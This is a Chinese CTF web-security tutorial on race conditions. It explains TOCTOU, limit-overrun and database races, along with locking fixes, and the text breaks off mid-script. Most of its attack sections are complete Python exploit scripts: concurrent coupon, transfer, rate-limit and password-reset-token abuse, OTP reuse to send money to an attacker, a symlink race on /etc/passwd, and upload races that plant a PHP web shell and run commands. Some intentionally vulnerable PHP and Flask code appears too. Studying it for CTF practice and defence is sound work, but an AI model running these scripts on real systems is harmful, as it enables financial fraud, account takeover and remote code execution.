P16 条件竞争

2022-03-12 CTF-WEB 詹英

梳理条件竞争(Race Condition)漏洞的原理、分类、Web 场景下的利用技巧、CTF 解题方法与防御措施,覆盖 HTTP 竞争、文件竞争、数据库竞争、TOCTOU 等多种场景。

一、条件竞争概述

1.1 什么是条件竞争

条件竞争(Race Condition)是指:
  当多个进程/线程/请求并发访问共享资源时
  程序的输出/行为依赖于这些操作的执行顺序
  而该顺序是不可预测或不受控制的
  → 导致非预期的安全漏洞

形象比喻:
  两个人同时从 ATM 取同一账户的钱
  ┌───────────────────────────────────────┐
  │ 账户余额:100 元                        │
  │                                        │
  │ 线程A(取 100)    线程B(取 100)       │
  │   读取余额=100       读取余额=100       │
  │   检查 100>=100      检查 100>=100     │
  │   扣款 100           扣款 100          │
  │   写入余额=0         写入余额=0        │
  │                                        │
  │ 结果:取出 200,余额却变为 0!           │
  └───────────────────────────────────────┘

1.2 竞争条件形成的三要素

① 共享资源(Shared Resource)
   文件、数据库记录、内存变量、Session、全局状态等
   多个请求/线程都可以访问和修改

② 并发访问(Concurrent Access)
   多个请求/线程同时或交叉执行
   Web 场景:多个 HTTP 请求几乎同时到达

③ 非原子操作(Non-Atomic Operation)
   对共享资源的操作不是一个不可分割的整体
   典型模式:读取 → 判断 → 修改(Check-Then-Act)
   在读取和修改之间存在"窗口期"

攻击核心:
  在窗口期内插入另一个操作,破坏程序预期的执行顺序

1.3 竞争条件危害

危害类型 典型场景 危害等级
任意代码执行 TOCTOU → 替换文件 → RCE 🔴 严重
权限绕过 并发请求绕过一次性校验 🔴 严重
无限制资源消耗 优惠券/积分无限使用 🔴 严重
数据一致性破坏 超卖/重复支付/余额透支 🔴 严重
信息泄露 并发读取竞争状态数据 🟠 高
拒绝服务(DoS) 竞争触发死锁/崩溃 🟠 高
身份混淆 Session 竞争导致用户交叉 🔴 严重

1.4 条件竞争分类(按共享资源分类)

类型一:状态竞争(Limit Overrun)

典型场景:
  检查用户是否有权限(如余额、次数、库存)
  在检查和消耗之间存在窗口期

伪代码(漏洞版本):
  if (user.balance >= price) {        // ① 检查:余额充足
      sleep(1ms);                     // ← 窗口期!
      user.balance -= price;          // ② 扣款
      deliver_item();                 // ③ 发货
  }

攻击:
  并发发送 100 个请求
  每个请求都在 ① 时读到余额充足
  然后全部通过 ② 扣款
  → 只有一份余额,却购买了 100 份商品!

影响场景:
  - 优惠券/优惠码重复使用
  - 积分/余额超额消费
  - 投票/点赞超限
  - 商品库存超卖
  - API 调用次数限制绕过

类型二:TOCTOU(检查时到使用时)

TOCTOU = Time Of Check To Time Of Use

模式:
  时间点 T1:检查资源状态(Check)
  时间点 T2:使用资源(Use)
  攻击:在 T1 和 T2 之间修改资源状态

文件 TOCTOU 经典示例:
  T1: if (access("/tmp/file", R_OK) == 0)  // 检查:有读权限
      // ← 攻击者在此将文件替换为符号链接
  T2:     open("/tmp/file", O_RDONLY);      // 使用:打开文件(实际打开了链接目标)

Web 场景 TOCTOU:
  T1: 检查上传文件类型(白名单验证)
  T2: 将文件移动到最终目录
  攻击:在 T1 和 T2 之间替换文件内容

  T1: 验证验证码有效性
  T2: 消耗验证码(标记为已使用)
  攻击:在 T1 和 T2 之间并发发送多个请求

类型三:数据竞争(Data Race)

多个线程/请求同时读写同一数据
没有适当的同步机制

示例:
  请求 A 读取计数器值 = 5
  请求 B 读取计数器值 = 5
  请求 A 写入计数器值 = 6
  请求 B 写入计数器值 = 6
  最终值:6(应该是 7!)→ 更新丢失(Lost Update)

更新丢失场景:
  - 访问计数器
  - 文件并发写入
  - 账户余额更新
  - 库存数量更新

类型四:顺序竞争(Order Race)

程序假设操作按特定顺序执行
但并发环境下顺序可被打破

示例(注册流程):
  预期顺序:验证邮箱 → 创建账户 → 发送欢迎邮件
  实际:两个并发注册请求都通过了"邮箱唯一性"检查
         → 创建了两个相同邮箱的账户

示例(权限分配):
  预期:创建账户 → 分配默认权限
  实际:在分配权限前另一请求已使用该账户

1.5 条件竞争分类(按竞争窗口大小分类)

微窗口(Micro Window):< 1ms
  → 需要单包攻击(Single-Packet Attack)
  → 需要精确时序控制
  → 典型:内存中的变量读写

小窗口(Small Window):1ms - 100ms
  → 需要多线程高并发请求
  → 典型:数据库读-改-写操作

大窗口(Large Window):> 100ms
  → 普通并发即可触发
  → 典型:涉及文件 I/O、外部 API 调用
  → 典型:异步处理任务队列

1.6 竞争窗口与时序分析

1.6.1 识别竞争窗口

关键问题:在哪两个操作之间存在窗口期?

典型窗口模式:

① 读-检查-写(Read-Check-Write)
   read(value)       ← 读取当前状态
   if (check(value)) ← 检查条件
       write(value)  ← 修改状态
   窗口:read 到 write 之间

② 验证-使用(Validate-Use)
   validate(input)   ← 验证合法性
   use(input)        ← 使用输入
   窗口:validate 到 use 之间(TOCTOU)

③ 创建-配置(Create-Configure)
   create(resource)  ← 创建资源
   configure(resource) ← 配置资源
   窗口:create 到 configure 之间

④ 生成-消费(Generate-Consume)
   token = generate()  ← 生成 token
   store(token)        ← 存储 token
   窗口:generate 到 store 之间(可预测 token)

1.6.2 竞争窗口放大技巧

# 放大窗口技巧:让服务器在窗口期内执行更多操作
# 使窗口从微秒级扩大到毫秒级,提高攻击成功率

# 技巧一:发送大请求体(让服务器先解析请求,再处理逻辑)
# 在业务逻辑前插入大量无害处理时间

# 技巧二:利用 Nagle 算法(TCP 层面延迟)
# 故意发送不完整的 HTTP 请求,只差最后几字节
# 所有请求同时发送最后几字节 → 服务器同时处理所有请求

# 技巧三:利用服务器资源竞争
# 在高负载时发送请求(服务器处理更慢,窗口更大)

# 技巧四:针对涉及外部 I/O 的操作
# 数据库查询、文件读写、外部 API 调用
# 这些操作本身耗时 → 窗口天然较大

1.6.3 网络时序模型

单线程服务器(PHP 默认模型):
  请求 A ──[处理中]──────────────────── 完成
  请求 B              ──[处理中]──────── 完成

  → 顺序执行,无竞争窗口(理论上)

多线程/多进程服务器:
  请求 A ──[读]──[检查]────[写]──── 完成
                      ↑
  请求 B ──[读]──[检查]────[写]──── 完成
          ↑ 两者同时读到相同状态!

异步服务器(Node.js / Tornado):
  请求 A ──[读]──[await DB]──[检查]──[写]──
                     ↕ 事件循环切换!
  请求 B ──[读]──[await DB]──[检查]──[写]──

  → await 处发生上下文切换 → 竞争窗口!

二、HTTP 请求竞争

2.1 基本并发攻击

#!/usr/bin/env python3
"""
基础 HTTP 竞争攻击脚本
使用 threading 模块实现并发请求
"""
import threading
import requests
import time
from typing import List, Dict, Any

TARGET   = "http://target.com"
SESSION  = requests.Session()

def make_request(url: str, data: dict, results: list, idx: int):
    """发送单个请求并记录结果"""
    try:
        r = SESSION.post(url, json=data, timeout=10)
        results[idx] = {
            "status":   r.status_code,
            "body":     r.text[:200],
            "time":     time.time(),
        }
    except Exception as e:
        results[idx] = {"error": str(e)}

def race_attack(url: str, data: dict, n_threads: int = 50) -> List[Dict]:
    """
    并发竞争攻击
    Args:
        url:       目标 URL
        data:      请求数据
        n_threads: 并发线程数
    """
    results  = [None] * n_threads
    threads  = []
    barrier  = threading.Barrier(n_threads)  # 同步屏障:所有线程就绪后同时发射

    def worker(idx):
        barrier.wait()   # 等待所有线程就绪
        make_request(url, data, results, idx)

    # 创建所有线程
    for i in range(n_threads):
        t = threading.Thread(target=worker, args=(i,))
        threads.append(t)

    # 同时启动所有线程
    for t in threads:
        t.start()

    # 等待所有线程完成
    for t in threads:
        t.join()

    return results

# ── 示例:优惠码重复使用 ──
print("[*] 发起条件竞争攻击:并发使用优惠码...")
results = race_attack(
    url  = f"{TARGET}/api/apply-coupon",
    data = {"coupon_code": "SAVE50", "user_id": 1001},
    n_threads = 50
)

# 统计成功次数
success = sum(1 for r in results if r and r.get("status") == 200)
print(f"[+] 成功次数:{success} / {len(results)}")
for i, r in enumerate(results):
    if r and r.get("status") == 200:
        print(f"    线程 {i:3d}: 成功 → {r['body'][:80]}")

2.2 精确时序攻击(同步屏障)

#!/usr/bin/env python3
"""
精确时序攻击 - 使用连接预热 + 同步屏障
减少网络抖动,提高竞争成功率
"""
import threading
import requests
import time

TARGET  = "http://target.com"
N       = 30    # 并发数

# 预先建立持久连接(HTTP Keep-Alive),减少 TCP 握手延迟
sessions = []
for _ in range(N):
    s = requests.Session()
    s.headers.update({
        "Connection":   "keep-alive",
        "Content-Type": "application/json",
    })
    # 预热连接:先发一个无害请求建立 TCP 连接
    try:
        s.get(f"{TARGET}/api/ping", timeout=5)
    except:
        pass
    sessions.append(s)

print(f"[*] {N} 个连接预热完毕,准备攻击...")

results = [None] * N
barrier = threading.Barrier(N)
PAYLOAD = {"coupon": "VIP2024", "amount": 100}

def attack(idx: int):
    barrier.wait()   # 同步屏障:所有线程到达此处后同时继续
    t_start = time.perf_counter()
    try:
        r = sessions[idx].post(
            f"{TARGET}/api/redeem",
            json    = PAYLOAD,
            timeout = 10,
        )
        results[idx] = {
            "ok":   r.status_code == 200,
            "code": r.status_code,
            "body": r.text[:100],
            "ms":   (time.perf_counter() - t_start) * 1000,
        }
    except Exception as e:
        results[idx] = {"ok": False, "error": str(e)}

threads = [threading.Thread(target=attack, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()

# 分析结果
ok_count = sum(1 for r in results if r and r.get("ok"))
print(f"\n[+] 攻击完成:{ok_count}/{N} 次成功")
timings = [r["ms"] for r in results if r and "ms" in r]
if timings:
    print(f"[*] 响应时间:min={min(timings):.1f}ms  "
          f"max={max(timings):.1f}ms  "
          f"avg={sum(timings)/len(timings):.1f}ms")

2.3 使用 aiohttp 异步并发

#!/usr/bin/env python3
"""
使用 asyncio + aiohttp 实现高并发竞争攻击
适合需要大量并发(100+)的场景
"""
import asyncio
import aiohttp
import time

TARGET = "http://target.com"
N      = 100    # 并发数

async def send_request(session: aiohttp.ClientSession,
                        url: str, data: dict,
                        idx: int, event: asyncio.Event) -> dict:
    """等待发令信号后立即发送请求"""
    await event.wait()   # 等待所有协程就绪后的发令
    t = time.perf_counter()
    try:
        async with session.post(url, json=data, timeout=aiohttp.ClientTimeout(total=10)) as r:
            body = await r.text()
            return {
                "idx":    idx,
                "status": r.status,
                "body":   body[:100],
                "ms":     (time.perf_counter() - t) * 1000,
            }
    except Exception as e:
        return {"idx": idx, "error": str(e)}

async def race_async(url: str, data: dict, n: int = N):
    """异步竞争攻击主函数"""
    event   = asyncio.Event()       # 发令枪
    results = []

    # 创建连接器(预建连接池)
    connector = aiohttp.TCPConnector(
        limit          = n,
        keepalive_timeout = 30,
        enable_cleanup_closed = True,
    )

    async with aiohttp.ClientSession(connector=connector) as session:
        # 预热:先建立连接
        warmup_tasks = [
            session.get(f"{TARGET}/api/ping")
            for _ in range(min(n, 10))
        ]
        try:
            await asyncio.gather(*warmup_tasks, return_exceptions=True)
        except:
            pass
        print(f"[*] 连接预热完毕,准备 {n} 并发攻击...")

        # 创建所有攻击任务(此时未发送)
        tasks = [
            send_request(session, url, data, i, event)
            for i in range(n)
        ]

        # 给 asyncio 一小段时间让所有任务进入等待状态
        await asyncio.sleep(0.1)

        # 发令:所有任务同时发送
        event.set()
        results = await asyncio.gather(*tasks)

    return results

# 运行攻击
results = asyncio.run(race_async(
    url  = f"{TARGET}/api/apply-coupon",
    data = {"code": "FLASH50", "uid": 1001},
    n    = 100
))

success = [r for r in results if r.get("status") == 200]
print(f"[+] 成功 {len(success)}/{N} 次")

2.4 Burp Suite 竞争攻击

Burp Suite Turbo Intruder 使用方法:

① 在 Repeater 中构造请求
② 右键 → Send to Turbo Intruder
③ 使用以下脚本:

─────────────────────────────────────────────
def queueRequests(target, wordlists):
    engine = RequestEngine(
        endpoint     = target.endpoint,
        concurrentConnections = 30,
        requestsPerConnection = 100,
        pipeline     = True,           # HTTP Pipeline 同一连接多请求
    )

    # 发送 50 个相同请求
    for i in range(50):
        engine.queue(target.req, gate='race1')

    # 同时释放所有请求
    engine.openGate('gate1')   # 触发所有排队请求同时发送

def handleResponse(req, interesting):
    table.add(req)
─────────────────────────────────────────────

④ 关键参数说明:
   pipeline=True         → HTTP 流水线,同一连接发多个请求(减少延迟差异)
   gate='race1'          → 请求门控:先排队,等待 openGate 信号
   engine.openGate()     → 同时释放所有排队请求

Burp Suite 2023.9+ 内置 Race Conditions 功能:
① Repeater → 右键 → Add to group
② 创建请求组(同一组内的请求同时发送)
③ Group → Send group in parallel

三、文件操作竞争(TOCTOU)

3.1 文件上传竞争

漏洞场景:
  许多 Web 应用文件上传流程:
  
  ┌─────────────────────────────────────────────────────────┐
  │ ① 接收上传文件 → 临时保存到 /tmp/upload_xxx             │
  │ ② 检查文件类型/内容(白名单验证)                        │
  │ ③ 如果合法 → 移动到最终目录 /var/www/uploads/           │
  │ ④ 如果非法 → 删除临时文件                               │
  └─────────────────────────────────────────────────────────┘
  
竞争窗口:
  步骤 ① 和 ② 之间,文件已存在于临时目录
  但尚未被验证/删除
  → 在此期间访问临时文件路径 → 可能执行恶意文件!

攻击步骤:
  线程 A:持续上传 PHP WebShell(文件名已知或可预测)
  线程 B:持续访问 /tmp/upload_xxx.php(尝试执行它)
  
  希望 B 能在 A 的文件被删除前访问到它
#!/usr/bin/env python3
"""
文件上传竞争攻击脚本
同时上传恶意文件和访问临时路径
"""
import threading
import requests
import itertools
import string
import time

TARGET       = "http://target.com"
UPLOAD_URL   = f"{TARGET}/upload.php"
WEBSHELL     = b"<?php system($_GET['cmd']); ?>"
FILENAME     = "shell.php"
SUCCESS_FLAG = False

def upload_thread():
    """持续上传 WebShell"""
    global SUCCESS_FLAG
    s = requests.Session()
    count = 0
    while not SUCCESS_FLAG:
        try:
            s.post(
                UPLOAD_URL,
                files={"file": (FILENAME, WEBSHELL, "image/jpeg")},
                timeout=5,
            )
            count += 1
        except:
            pass
    print(f"[*] 上传线程共发送 {count} 次")

def access_thread(path: str):
    """持续访问目标路径,检测是否执行成功"""
    global SUCCESS_FLAG
    s   = requests.Session()
    url = f"{TARGET}/{path}?cmd=id"
    while not SUCCESS_FLAG:
        try:
            r = s.get(url, timeout=3)
            if r.status_code == 200 and "uid=" in r.text:
                SUCCESS_FLAG = True
                print(f"\n[!] 竞争成功!RCE 触发!")
                print(f"    URL:{url}")
                print(f"    输出:{r.text[:200]}")
                break
        except:
            pass

# 可能的临时文件路径
PATHS = [
    "uploads/shell.php",
    "tmp/shell.php",
    "upload/shell.php",
    "files/shell.php",
]

# 启动攻击线程
threads = []

# 多个上传线程
for _ in range(5):
    t = threading.Thread(target=upload_thread)
    t.daemon = True
    threads.append(t)

# 多个访问线程
for path in PATHS:
    for _ in range(3):
        t = threading.Thread(target=access_thread, args=(path,))
        t.daemon = True
        threads.append(t)

print(f"[*] 启动 {len(threads)} 个线程,开始竞争攻击...")
t_start = time.time()
for t in threads: t.start()
for t in threads: t.join(timeout=60)

if not SUCCESS_FLAG:
    print(f"[-] 60 秒内未竞争成功,尝试增加线程数或调整路径")
else:
    print(f"[+] 总耗时:{time.time() - t_start:.1f}s")

3.2 文件名预测攻击

<?php
// ── 漏洞代码:可预测的临时文件名 ──
$upload_dir = '/var/www/html/uploads/';
$filename   = $_FILES['file']['name'];          // 使用原始文件名
$tmp_path   = $upload_dir . 'tmp_' . $filename; // 临时路径可预测!

move_uploaded_file($_FILES['file']['tmp_name'], $tmp_path);

// 检查文件类型
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (!in_array($ext, ['jpg', 'png', 'gif'])) {
    unlink($tmp_path);  // 删除非法文件
    die('不允许的文件类型');
}

// 移动到最终目录
rename($tmp_path, $upload_dir . 'final_' . $filename);
echo '上传成功';
?>
# ── 利用可预测文件名进行竞争 ──
import threading, requests, time

TARGET    = "http://target.com"
FILENAME  = "shell.php"
TMP_URL   = f"{TARGET}/uploads/tmp_{FILENAME}"
SHELL     = b"<?php system($_GET['cmd']); ?>"

found = threading.Event()

def keep_uploading():
    s = requests.Session()
    while not found.is_set():
        s.post(f"{TARGET}/upload.php",
               files={"file": (FILENAME, SHELL, "image/jpeg")},
               timeout=5)

def keep_accessing():
    s = requests.Session()
    while not found.is_set():
        r = s.get(f"{TMP_URL}?cmd=id", timeout=2)
        if r.status_code == 200 and "uid=" in r.text:
            found.set()
            print(f"[!] 竞争成功!{r.text[:100]}")

# 5 上传 + 5 访问
ts = ([threading.Thread(target=keep_uploading) for _ in range(5)] +
      [threading.Thread(target=keep_accessing) for _ in range(5)])
for t in ts: t.daemon = True; t.start()
for t in ts: t.join(timeout=30)

3.3 符号链接竞争(Linux TOCTOU)

#!/usr/bin/env python3
"""
符号链接竞争攻击(针对 CGI / 服务端脚本处理)
在文件被检查和使用之间替换为符号链接
"""
import os
import threading
import time

# 假设服务器会读取 /tmp/user_upload 文件内容
TARGET_READ  = "/tmp/user_upload"    # 服务器要读的文件
TARGET_LINK  = "/etc/passwd"         # 攻击目标(符号链接指向)
SAFE_CONTENT = b"safe content"       # 通过检查的安全内容

race_success = threading.Event()

def create_safe_file():
    """持续创建包含安全内容的文件(用于通过检查)"""
    while not race_success.is_set():
        try:
            if os.path.islink(TARGET_READ):
                os.unlink(TARGET_READ)
            with open(TARGET_READ, 'wb') as f:
                f.write(SAFE_CONTENT)
        except:
            pass

def create_symlink():
    """持续将文件替换为符号链接"""
    while not race_success.is_set():
        try:
            if os.path.exists(TARGET_READ):
                os.unlink(TARGET_READ)
            os.symlink(TARGET_LINK, TARGET_READ)  # 替换为符号链接!
        except:
            pass
        time.sleep(0.0001)  # 极短的切换间隔

# 创建检查线程(模拟服务器检查)和符号链接线程
t1 = threading.Thread(target=create_safe_file)
t2 = threading.Thread(target=create_symlink)

t1.daemon = t2.daemon = True
t1.start()
t2.start()

# 持续访问,检测是否读到了 /etc/passwd 内容
# (实际攻击中是让服务器去读取)
print("[*] 符号链接竞争攻击中...")

四、数据库竞争

4.1 SELECT-THEN-UPDATE 竞争

-- ── 漏洞场景:余额扣款(伪代码)──

-- 步骤 1:检查余额
SELECT balance FROM accounts WHERE user_id = 1001;
-- 返回:balance = 100

-- 步骤 2:在 Python/PHP 中判断
-- if balance >= amount: pass  (此时另一请求也读到了 balance=100)

-- 步骤 3:扣款
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;

-- 两个并发请求都通过了步骤 1 的检查
-- 都执行了步骤 3
-- → 余额从 100 变成 -100!(超额扣款)

-- ── 错误的"修复":在 UPDATE 中添加 WHERE 条件 ──
UPDATE accounts
SET balance = balance - 100
WHERE user_id = 1001
  AND balance >= 100;    -- 添加条件,但仍有竞争!

-- 为什么仍有问题?
-- 如果两个请求同时执行这条 SQL
-- 数据库在 READ COMMITTED 隔离级别下
-- 两个请求都能读到 balance=100
-- 都通过 AND balance >= 100 的检查
-- → 都成功扣款!

-- ── 正确修复:使用数据库事务 + 锁 ──
BEGIN;
SELECT balance FROM accounts WHERE user_id = 1001 FOR UPDATE;  -- 行锁!
-- 另一个事务在此处被阻塞,直到当前事务提交
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;
COMMIT;

4.2 重复提交竞争

#!/usr/bin/env python3
"""
重复提交竞争:通过并发绕过"只能使用一次"的限制
"""
import asyncio
import aiohttp

TARGET  = "http://target.com"
COUPON  = "NEWYEAR2024"

async def use_coupon(session: aiohttp.ClientSession,
                     coupon: str, idx: int) -> dict:
    try:
        async with session.post(
            f"{TARGET}/api/coupon/redeem",
            json    = {"code": coupon, "user_id": 1001},
            timeout = aiohttp.ClientTimeout(total=10)
        ) as r:
            return {"idx": idx, "status": r.status, "body": await r.text()}
    except Exception as e:
        return {"idx": idx, "error": str(e)}

async def main():
    N = 50
    async with aiohttp.ClientSession() as s:
        # 并发发送 50 个优惠码使用请求
        tasks = [use_coupon(s, COUPON, i) for i in range(N)]
        results = await asyncio.gather(*tasks)

    success = [r for r in results if r.get("status") == 200]
    print(f"[+] 成功使用优惠码 {len(success)} 次!")
    # 正常情况应只能使用 1 次
    # 竞争成功后可能使用 N 次

asyncio.run(main())

4.3 UNIQUE 约束竞争

#!/usr/bin/env python3
"""
数据库 UNIQUE 约束竞争:
即使有唯一约束,并发插入仍可能导致短暂的重复数据
"""
import threading
import requests

TARGET = "http://target.com"

# 并发注册相同邮箱
def register(email: str, results: list, idx: int):
    r = requests.post(
        f"{TARGET}/api/register",
        json={"email": email, "password": "pass123", "username": f"user{idx}"}
    )
    results[idx] = {"status": r.status_code, "body": r.text[:100]}

results  = [None] * 20
email    = "target@example.com"
threads  = [threading.Thread(target=register, args=(email, results, i))
            for i in range(20)]
barrier  = threading.Barrier(20)

def run_with_barrier(idx):
    barrier.wait()
    register(email, results, idx)

threads = [threading.Thread(target=run_with_barrier, args=(i,)) for i in range(20)]
for t in threads: t.start()
for t in threads: t.join()

success = [r for r in results if r and r["status"] == 201]
print(f"[+] 成功注册 {len(success)} 个相同邮箱的账户")
# 正常应只有 1 个成功
# 竞争可能使多个请求在 UNIQUE 检查前都通过

4.4 乐观锁绕过

乐观锁(Optimistic Locking)机制:
  使用版本号/时间戳检测并发冲突

  UPDATE orders
  SET status = 'processed', version = version + 1
  WHERE id = 1 AND version = 5;   ← 检查版本号

  若版本号不匹配(被其他请求修改过),更新失败

竞争绕过:
  如果多个请求在几乎同一时刻都读到 version=5
  并都执行 UPDATE ... WHERE version=5
  在数据库层面,第一个执行的会成功(version 变为 6)
  后续的由于 version=5 不匹配而失败

  → 乐观锁只能保证"只有一个成功",不能防止"多次尝试"
  → 对于余额扣款:需要应用层重试逻辑 + 充分的错误处理
  → 若应用不处理失败情况(直接返回成功)→ 仍然漏洞

五、业务逻辑竞争

5.1 优惠券/折扣竞争

漏洞场景:
  - 每个账号只能使用一次的优惠码
  - 限时限量的秒杀活动
  - 积分兑换(检查积分 → 兑换商品 → 扣除积分)
  - 邀请奖励(A 邀请 B 注册,奖励 A)

典型漏洞代码(Python/Flask):
# ── 漏洞版本 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon():
    code    = request.json['code']
    user_id = request.json['user_id']

    # ① 检查优惠码是否有效
    coupon = db.query("SELECT * FROM coupons WHERE code=? AND used=0", code)
    if not coupon:
        return jsonify({"error": "无效或已使用的优惠码"}), 400

    # ── 竞争窗口在此 ──(并发请求都通过了 ① 的检查)

    # ② 标记为已使用
    db.execute("UPDATE coupons SET used=1, used_by=? WHERE code=?",
               user_id, code)

    # ③ 给账户加余额
    db.execute("UPDATE accounts SET balance=balance+50 WHERE user_id=?",
               user_id)

    return jsonify({"success": True, "added": 50})


# ── 安全版本 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon_safe():
    code    = request.json['code']
    user_id = request.json['user_id']

    # 使用原子性的 UPDATE(带条件的 CAS 操作)
    # 只有在 used=0 时才更新,确保只有一个请求能成功
    rows_affected = db.execute(
        "UPDATE coupons SET used=1, used_by=? "
        "WHERE code=? AND used=0",
        user_id, code
    )

    if rows_affected == 0:
        return jsonify({"error": "优惠码无效或已使用"}), 400

    # 仅在成功标记后才执行奖励
    db.execute("UPDATE accounts SET balance=balance+50 WHERE user_id=?",
               user_id)
    return jsonify({"success": True})

5.2 转账/支付竞争

# ── 漏洞场景:转账 ──
@app.route('/api/transfer', methods=['POST'])
def transfer():
    from_id = session['user_id']
    to_id   = request.json['to']
    amount  = request.json['amount']

    # ① 检查余额
    balance = db.query_one("SELECT balance FROM users WHERE id=?", from_id)
    if balance < amount:
        return jsonify({"error": "余额不足"}), 400

    # ── 竞争窗口 ──

    # ② 扣除发送方
    db.execute("UPDATE users SET balance=balance-? WHERE id=?", amount, from_id)
    # ③ 增加接收方
    db.execute("UPDATE users SET balance=balance+? WHERE id=?", amount, to_id)
    return jsonify({"success": True})

# ── 攻击:并发 50 笔 100 元的转账(账户只有 100 元)──
# 成功转出 5000 元!
#!/usr/bin/env python3
"""并发转账攻击脚本"""
import asyncio, aiohttp, json

TARGET   = "http://target.com"
TOKEN    = "eyJhbGciOiJIUzI1NiJ9..."   # 已登录的 JWT
N        = 50

async def do_transfer(session, to_uid, amount, idx):
    headers = {"Authorization": f"Bearer {TOKEN}"}
    try:
        async with session.post(
            f"{TARGET}/api/transfer",
            json    = {"to": to_uid, "amount": amount},
            headers = headers,
            timeout = aiohttp.ClientTimeout(total=10)
        ) as r:
            body = await r.json()
            return {"idx": idx, "ok": r.status == 200, "body": body}
    except Exception as e:
        return {"idx": idx, "ok": False, "error": str(e)}

async def main():
    async with aiohttp.ClientSession() as s:
        tasks   = [do_transfer(s, 9999, 100, i) for i in range(N)]
        results = await asyncio.gather(*tasks)

    ok = sum(1 for r in results if r["ok"])
    print(f"[+] {ok}/{N} 次转账成功(账户应只有 100 元)")
    print(f"[!] 实际转出约 {ok * 100} 元")

asyncio.run(main())

5.3 限时/限次 API 竞争

#!/usr/bin/env python3
"""
API 速率限制绕过
通过并发在速率限制计数器更新前发送多个请求
"""
import asyncio, aiohttp, time

TARGET  = "http://target.com"
API_KEY = "ak_test_xxxxxxxxxxxx"

# 目标 API:每分钟只允许 10 次调用
# 但计数器是非原子更新的

async def call_api(session, idx, event):
    await event.wait()  # 等待发令
    headers = {"X-API-Key": API_KEY}
    try:
        async with session.post(
            f"{TARGET}/api/expensive-operation",
            json    = {"query": "sensitive_data"},
            headers = headers,
            timeout = aiohttp.ClientTimeout(total=10)
        ) as r:
            body = await r.text()
            return {"idx": idx, "status": r.status, "ok": r.status == 200}
    except Exception as e:
        return {"idx": idx, "error": str(e)}

async def main():
    N     = 50   # 期望调用 50 次(超过限额 10 次)
    event = asyncio.Event()

    async with aiohttp.ClientSession() as s:
        tasks = [call_api(s, i, event) for i in range(N)]
        await asyncio.sleep(0.05)  # 让所有协程进入等待状态
        event.set()                # 发令
        results = await asyncio.gather(*tasks)

    ok = sum(1 for r in results if r.get("ok"))
    print(f"[+] 成功调用 {ok}/{N} 次(限额 10 次)")

asyncio.run(main())

六、Session 与 Token 竞争

6.1 Session 竞争

# ── 漏洞场景:Session 状态共享 ──

# 服务器代码(漏洞版)
@app.route('/api/action', methods=['POST'])
def action():
    user_id  = session['user_id']
    role     = session['role']

    # ① 检查权限
    if role != 'premium':
        return jsonify({"error": "需要 Premium 权限"}), 403

    # ── 竞争窗口 ──

    # ② 执行操作
    result = do_premium_action(user_id)
    return jsonify(result)

# 如果 session 在 ① 和 ② 之间被修改...
# (例如另一个请求将 role 降级)→ 权限检查已过,但权限实际已变
#!/usr/bin/env python3
"""
密码重置 Token 竞争利用
同时发送多个重置请求,尝试在 Token 消耗前多次使用
"""
import threading, requests, time

TARGET  = "http://target.com"
VICTIM  = "victim@example.com"
TOKEN   = None  # 从邮件中获取的重置 Token

def get_reset_token() -> str:
    """获取密码重置 Token(模拟)"""
    # 实际场景:通过邮件、参数泄露等方式获取 Token
    return "reset_abc123xyz"

TOKEN = get_reset_token()

def use_token(new_password: str, results: list, idx: int):
    """使用重置 Token 修改密码"""
    r = requests.post(
        f"{TARGET}/api/password/reset",
        json = {"token": TOKEN, "new_password": new_password},
        timeout = 5
    )
    results[idx] = {"status": r.status_code, "body": r.text[:100]}

# 并发使用同一 Token
N        = 20
results  = [None] * N
threads  = []
barrier  = threading.Barrier(N)

def worker(idx):
    barrier.wait()  # 同步屏障
    use_token(f"hacked_password_{idx}", results, idx)

threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()

success = [r for r in results if r and r["status"] == 200]
print(f"[+] Token 使用成功 {len(success)} 次(正常应只能用 1 次)")
if len(success) > 1:
    print("[!] Token 竞争成功!可多次重置密码")

6.2 验证码/OTP 竞争

#!/usr/bin/env python3
"""
OTP/验证码竞争攻击
在验证码被标记为"已验证"之前并发发送多个请求
"""
import threading, requests, time

TARGET  = "http://target.com"
OTP     = "123456"    # 拦截到的 OTP(假设通过其他方式获取)

def verify_and_act(idx: int, results: list):
    """同时提交 OTP 验证并执行后续操作"""
    # 场景:某些实现先验证 OTP,再在下一步操作中使用
    s = requests.Session()
    try:
        # 步骤 1:验证 OTP
        r1 = s.post(f"{TARGET}/api/otp/verify",
                    json={"otp": OTP, "action": "transfer"},
                    timeout=5)

        if r1.status_code == 200:
            # 步骤 2:执行操作(已通过 OTP 验证)
            r2 = s.post(f"{TARGET}/api/transfer",
                        json={"to": "attacker", "amount": 10000},
                        timeout=5)
            results[idx] = {
                "verify": r1.status_code,
                "action": r2.status_code,
                "body":   r2.text[:100]
            }
        else:
            results[idx] = {"verify": r1.status_code, "failed": True}
    except Exception as e:
        results[idx] = {"error": str(e)}

N       = 30
results = [None] * N
barrier = threading.Barrier(N)

def worker(idx):
    barrier.wait()
    verify_and_act(idx, results)

threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()

ok = sum(1 for r in results if r and r.get("action") == 200)
print(f"[+] {ok}/{N} 次操作成功(OTP 应只能用 1 次)")

七、常见场景条件竞争

7.1 PHP 文件包含竞争

<?php
// ── 漏洞场景:文件上传 + 包含 ──

// 上传处理(upload.php)
if ($_FILES['file']['size'] < 1000000) {
    $tmp  = $_FILES['file']['tmp_name'];
    $dest = '/var/www/uploads/' . basename($_FILES['file']['name']);
    
    move_uploaded_file($tmp, $dest);  // ① 移动文件(临时路径存在!)
    
    // ② 检查文件类型
    $ext  = pathinfo($dest, PATHINFO_EXTENSION);
    $allowed = ['jpg', 'png', 'gif'];
    
    if (!in_array($ext, $allowed)) {
        unlink($dest);              // ③ 删除非法文件
        echo '不允许的文件类型';
        exit;
    }
    
    echo '上传成功: ' . $dest;
}
// 窗口期:① 到 ③ 之间文件存在(可能 1-5ms)
?>
#!/usr/bin/env python3
"""PHP 文件上传竞争攻击"""
import threading, requests

TARGET   = "http://target.com"
SHELL    = "<?php system($_GET['cmd']); ?>"
FILENAME = "evil.php"

stop_flag = threading.Event()

def upload_loop():
